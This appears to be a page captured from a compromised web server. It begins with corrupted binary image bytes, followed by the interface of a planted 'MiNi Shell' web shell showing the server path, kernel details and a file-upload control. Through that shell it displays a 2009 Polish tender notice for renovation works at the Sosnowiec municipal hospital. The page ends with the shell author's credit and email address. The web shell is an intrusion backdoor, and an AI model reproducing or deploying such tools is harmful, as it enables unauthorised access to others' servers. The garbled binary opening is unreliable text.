JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090731/262384-N-2009.html

<p class="kh_header"><b>Sosnowiec: ROBOTY REMONTOWO-BUDOWLANE POMIESZCZEŃ SP ZZOZ SZPITAL MIEJSKI W SOSNOWCU - W PODZIALE NA 3 CZĘŚCI</b><br>
<b>Numer ogłoszenia: 262384 - 2009; data zamieszczenia: 31.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 0-32 2964219, 3630479, faks 0-32 2964219.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY REMONTOWO-BUDOWLANE POMIESZCZEŃ SP ZZOZ SZPITAL MIEJSKI W SOSNOWCU - W PODZIALE NA 3 CZĘŚCI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty remontowo-budowlane pomieszczeń SP ZZOZ Szpital Miejski w Sosnowcu, w podziale na 3 części, na które składają się cztery Zadania.
Część 1 (Zadanie nr 1 + Zadanie nr 4):
1. Zadanie nr 1 - Modernizacja i adaptacja pomieszczeń administracji kuchni i apteki na parterze pawilonu dla potrzeb poradni przyszpitalnych wraz z modernizacją holu z uwzględnieniem likwidacji barier architektonicznych wraz z dokumentacją projektową i nadzorem autorskim oraz nadzorem inwestorskim - Adaptacja pomieszczeń parteru segment A dla potrzeb poradni przyszpitalnych rejestracji i kasy, ul. Zegadłowicza 3.
2. Zadanie nr 4 - Dostosowanie pomieszczeń dla potrzeb czasowej lokalizacji komórek organizacyjnych Szpitala w okresie restrukturyzacji - pawilon A i C ul. Zegadłowicza (w tym łazienki, kuchenki, dyżurki) dla potrzeb oddziałów - wewnętrznego i psychosomatycznego, otolaryngologii i chirurgii - Remont oddziału wewnętrznego II p. pawilon C ul. Zegadłowicza 3.
Część 2:
3. Zadanie nr 2 - Modernizacja i adaptacja pomieszczeń zaplecza techniczno - administracyjnego po byłej rehabilitacji w budynku techniczno - gospodarczym wraz z dokumentacją projektową i nadzorem autorskim oraz nadzorem inwestorskim - Remont pomieszczeń administracyjnych i dachu budynku techniczno - gospodarskiego ul. Zegadłowicza 3.
Część 3:
4. Zadanie nr 3 - Modernizacja i adaptacja pomieszczeń przy RTG dla potrzeb poradni przyszpitalnych, II p. Pawilon B wraz z dokumentacją projektową i nadzorem autorskim oraz nadzorem inwestorskim oraz pomieszczeń na potrzeby kaplicy szpitalnej - Adaptacja pomieszczeń II p pawilon A,B,C ul. Zegadłowicza 3..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy:
a.	posiadają uprawnienie do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
2. Spełnienie przez Wykonawcę warunków udziału w postępowaniu, Zamawiający będzie oceniał na podstawie dokumentów i oświadczeń zawartych w ofercie, przy zastosowaniu zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawcy posiadają uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, należy przedłożyć następujące dokumenty:
1.1  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.2 Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.3 ) złożyć oświadczenie według załącznika nr 2 do SIWZ.
- Dla Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się odpowiednio § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2006r. Nr 87, poz. 605).
2. W celu potwierdzenia, że Wykonawcy posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy:
2.1  przedłożyć wykaz wykonanych robót przez Wykonawcę w okresie ostatnich 5 lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  odpowiadające swoim rodzajem i  wartością  przedmiotowi zamówienia:
- w przypadku Części 1 (Zadanie nr 1 + Zadanie nr 4) - jedna robota budowlana o wartości brutto nie mniejszej niż 355 000,00 zł);
- w przypadku Części 2 (Zadanie nr 2) - jedna robota budowlana o wartości brutto nie mniejszej niż 140 000,00 zł);
- w przypadku Części 3 (Zadanie nr 3) - jedna robota budowlana o wartości brutto nie mniejszej niż 80 000,00 zł).
W wykazie należy  podać wartości, daty i miejsca wykonania robót wraz z dołączonymi dokumentami, potwierdzającymi należyte ich wykonanie  (według załącznika nr 6 do SIWZ ).
W wykazie należy  podać wartości, daty i miejsca wykonania robót wraz z dołączonymi dokumentami, potwierdzającymi należyte ich wykonanie  (według załącznika nr 6 do SIWZ ).
2.2 przedłożyć wykaz osób  (kadry kierowniczej) Wykonawcy odpowiedzialnych za realizację zamówienia (według załącznika nr 7 do SIWZ );
2.3  przedłożyć uprawnienia dla osób, które będą pełnić funkcje kierownicze:
- uprawnienia ogólnobudowlane i  instalacyjne: wod-kan., elektryczne;
2.4  przedłożyć zaświadczenia z właściwej izby samorządu zawodowego dla osób, które będą pełnić funkcje kierownicze, potwierdzające przynależność do izby oraz posiadanie aktualnego, wymaganego ubezpieczenia od odpowiedzialności cywilnej.
- złożyć oświadczenie według załącznika nr 2 do SIWZ.

3. W celu potwierdzenia, że Wykonawcy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy: 
- złożyć oświadczenie według załącznika nr 2 do SIWZ.

4. Dla Wykonawców występujących wspólnie (spółka cywilna, konsorcjum) ma w szczególności zastosowanie art. 23 Prawa zamówień publicznych. Oferta winna zawierać dokument potwierdzający ustanowienie pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Warunki określone w art. 22 ust. 1 pkt 2 i 3 Prawa zamówień publicznych mogą być spełnione przez jednego z Wykonawców lub Wykonawców łącznie. Pozostałe warunki dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców. 
6. Pełnomocnictwo - jeśli Wykonawcę reprezentuje pełnomocnik. 
	Forma pełnomocnictwa: oryginał lub kopia poświadczona za zgodność z oryginałem przez osoby uprawnione do reprezentacji podmiotu ujawnione we właściwym rejestrze lub ewidencji działalności gospodarczej.
7. Wypełnione czytelnie, podpisane i opieczętowane przez osobę/osoby uprawnione do reprezentowania Wykonawcy :
a)  formularz ofertowy  wg wzoru stanowiącego załącznik nr 1 do SIWZ.
b)  formularz oświadczeń wg wzoru stanowiącego załącznik nr 2  do SIWZ.
d)  kosztorysy ofertowe wycenione wg przedmiarów robót, które stanowią załącznik:
     do SIWZ:
- dla zadania nr 1  zgodnie z załącznikami nr 5.1;
- dla zadania nr 2  zgodnie z załącznikami nr 5.2;
- dla zadania nr 3  zgodnie z załącznikami nr 5.3;
- dla zadania nr 4  zgodnie z załącznikami nr 5.4.
e) wykaz wykonanych robót wg wzoru stanowiącego załącznik nr 6 do SIWZ.
f) wykaz osób odpowiedzialnych za realizację zamówienia wg wzoru stanowiącego załącznik nr 7 do SIWZ.
Dokumenty o których mowa w pkt. 1 mogą być przedstawione w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez osobę/osoby uprawnioną/e do reprezentowania Wykonawcy i opatrzone pieczęcią imienną.
Zamawiający wymaga, aby dokumenty określone w pkt. 6a, 6b, 6d, 6e  sporządzone były zgodnie z załącznikami w pełnym brzmieniu. Tym samym zaleca się wypełnienie załączników nr 1, 2, 6 i 7  na drukach stanowiących załączniki do niniejszej SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej Szpital Mijski w Sosnowcu 41-219 Sosnowiec, ul. Szpitalna 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej Szpital Mijski w Sosnowcu 41-219 Sosnowiec, ul. Szpitalna 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja i adaptacja pomieszczeń administracji kuchni i apteki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 (Zadanie nr 1 + Zadanie nr 4):
1. Zadanie nr 1 - Modernizacja i adaptacja pomieszczeń administracji kuchni i apteki na parterze pawilonu dla potrzeb poradni przyszpitalnych wraz z modernizacją holu z uwzględnieniem likwidacji barier architektonicznych wraz z dokumentacją projektową i nadzorem autorskim oraz nadzorem inwestorskim - Adaptacja pomieszczeń parteru segment A dla potrzeb poradni przyszpitalnych rejestracji i kasy, ul. Zegadłowicza 3.

1.1.	 W ramach Zadania nr 1, Wykonawca jest zobowiązany wykonać następujące roboty budowlane i instalacyjne:
- Wyrównywanie podłóg
- Roboty murarskie i murowe
- Tynkowanie   
- Roboty w zakresie stolarki budowlanej
- Pokrywanie podłóg i ścian
- Kładzenie glazury
- Kładzenie terakoty
- Roboty malarskie
- Roboty instalacyjne wodne i kanalizacyjne
- Roboty instalacyjne w zakresie urządzeń sanitarnych
- Roboty instalacyjne elektryczne
- Instalowanie wentylacji
- Wywóz gruzu wraz z opłatą za  utylizację                               

2. Zadanie nr 4 - Dostosowanie pomieszczeń dla potrzeb czasowej lokalizacji komórek organizacyjnych Szpitala w okresie restrukturyzacji - pawilon A i C ul. Zegadłowicza (w tym łazienki, kuchenki, dyżurki) dla potrzeb oddziałów - wewnętrznego i psychosomatycznego, otolaryngologii i chirurgii - Remont oddziału wewnętrznego II p. pawilon C ul. Zegadłowicza 3.
2.1. W ramach Zadania nr 4, Wykonawca jest zobowiązany wykonać następujące roboty budowlane i instalacyjne:
CPV 45262321-7 - Wyrównywanie podłóg
CPV 45262500-6 - Roboty murarskie i murowe
CPV 45410000-4 - Tynkowanie   
CPV 45421000-4 - Roboty w zakresie stolarki budowlanej
CPV 45430000-0 - Pokrywanie podłóg i ścian
CPV 45431000-9 - Kładzenie glazury
CPV 45431000-8 - Kładzenie terakoty
CPV 45442100-8 - Roboty malarskie
CPV 45332000-3 - Roboty instalacyjne wodne i kanalizacyjne
CPV 45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych
CPV 45310000-3 - Roboty instalacyjne elektryczne
CPV 45331210-1 - Instalowanie wentylacji
CPV 45111220-6 - Wywóz gruzu wraz z opłatą za  utylizację.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja i adaptacja pomieszczeń zaplecza techniczno - administracyjnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2:
Zadanie nr 2 - Modernizacja i adaptacja pomieszczeń zaplecza techniczno - administracyjnego po byłej rehabilitacji w budynku techniczno - gospodarczym wraz z dokumentacją projektową i nadzorem autorskim oraz nadzorem inwestorskim - Remont pomieszczeń administracyjnych i dachu budynku techniczno - gospodarskiego ul. Zegadłowicza 3.
3.1. W ramach Zadania nr 2, Wykonawca jest zobowiązany wykonać następujące roboty budowlane i instalacyjne:
- Wyrównywanie podłóg
- Roboty murarskie i murowe
- Tynkowanie   
- Roboty w zakresie stolarki budowlanej
- Pokrywanie podłóg i ścian
- Kładzenie glazury
- Kładzenie terakoty
- Roboty malarskie
- Roboty instalacyjne wodne i kanalizacyjne
- Roboty instalacyjne w zakresie urządzeń sanitarnych
- Roboty instalacyjne elektryczne
- Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty
- Instalowanie wentylacji
- Wywóz gruzu wraz z opłatą za  utylizację.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja i adaptacja pomieszczeń przy RTG dla potrzeb poradni przyszpitalnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3:
Zadanie nr 3 - Modernizacja i adaptacja pomieszczeń przy RTG dla potrzeb poradni przyszpitalnych, II p. Pawilon B wraz z dokumentacją projektową i nadzorem autorskim oraz nadzorem inwestorskim oraz pomieszczeń na potrzeby kaplicy szpitalnej - Adaptacja pomieszczeń II p pawilon A,B,C ul. Zegadłowicza 3.
W ramach Zadania nr 3, Wykonawca jest zobowiązany wykonać następujące roboty budowlane i instalacyjne:
- Wyrównywanie podłóg
- Roboty murarskie i murowe
- Tynkowanie   
- Roboty w zakresie stolarki budowlanej
- Pokrywanie podłóg i ścian
- Kładzenie glazury
- Kładzenie terakoty
- Roboty malarskie
- Roboty instalacyjne wodne i kanalizacyjne
- Roboty instalacyjne w zakresie urządzeń sanitarnych
- Roboty instalacyjne elektryczne
- Instalowanie wentylacji
- Wywóz gruzu wraz z opłatą za  utylizację.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com